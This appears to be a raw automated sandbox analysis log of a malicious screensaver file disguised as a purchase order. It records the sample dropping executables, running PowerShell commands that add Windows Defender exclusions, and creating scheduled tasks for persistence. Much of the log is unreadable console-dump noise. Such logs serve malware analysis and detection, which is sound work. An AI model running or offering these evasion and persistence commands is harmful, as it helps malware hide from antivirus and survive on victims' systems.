                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............'.....2.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X..................................s..............'.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X..................................s....................l.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X..................................s..............'.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................X.......(..........................s..............'.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................X.......4..........................s..............'.............................Jump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ........................................(.P.....................................................................................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................6.........................s............................X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................6.........................s............................X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........7.........................s.................... .......X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................%7.........................s............................X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................77.........................s............................X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................U7.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....k7.........................s....................$.......X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................P........7.........................s............................X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................7.........................s............................X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................7.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................7.........................s............................X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................8.........................s....................l.......X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................8.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................48.........................s............................X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................A8.........................s............................X...............
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|........w.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|........w.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|........x.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|.......%x.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|.......7x.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|.......Cx.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n.......................|.......Ux.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|.......ax.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.|.......sx.........................s.................... .......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|........x.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|........x.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|........x.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......x.........................s....................$.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|........x.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|........x.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|........x.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|........x.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................y.........................s....................l.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|........y.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................|.......(y.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................4y.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................j..........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................w..........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n..........................................................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1....................................s.................... .......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.....#..........................s....................$.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................./..........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................B..........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................N..........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................l..........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................l.......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.R.:. ...x.......`.........................................................".............................
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................E.R.R.O.(.P.....x.......`...............................................................j.......................
                  Source: PO#_1100015533.scrStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: PO#_1100015533.scrStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: PO#_1100015533.scrVirustotal: Detection: 31%
                  Source: PO#_1100015533.scrReversingLabs: Detection: 21%
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrFile read: C:\Users\user\Desktop\PO#_1100015533.scrJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\PO#_1100015533.scr "C:\Users\user\Desktop\PO#_1100015533.scr" /S
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Users\user\Desktop\PO#_1100015533.scr "C:\Users\user\Desktop\PO#_1100015533.scr"
                  Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {B8732EC0-088E-49BD-8386-4378D1DF7E0C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                  Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                  Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
                  Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f
                  Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: unknownProcess created: C:\Windows\ehome\ehrecvr.exe C:\Windows\ehome\ehRecvr.exe
                  Source: unknownProcess created: C:\Windows\ehome\ehsched.exe C:\Windows\ehome\ehsched.exe
                  Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                  Source: unknownProcess created: C:\Windows\System32\ieetwcollector.exe C:\Windows\system32\IEEtwCollector.exe /V
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmp2972.tmp"
                  Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                  Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                  Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Users\user\Desktop\PO#_1100015533.scr "C:\Users\user\Desktop\PO#_1100015533.scr"Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrProcess created: C:\Users\user\AppData\Local\Temp\Microsofts.exe "C:\Users\user\AppData\Local\Temp\Microsofts.exe" Jump to behavior
                  Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe C:\Users\user\AppData\Roaming\hVVSnrrP.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmp2972.tmp"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Roaming\hVVSnrrP.exeProcess created: C:\Users\user\AppData\Roaming\hVVSnrrP.exe "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f
                  Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: shfolder.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: wow64win.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
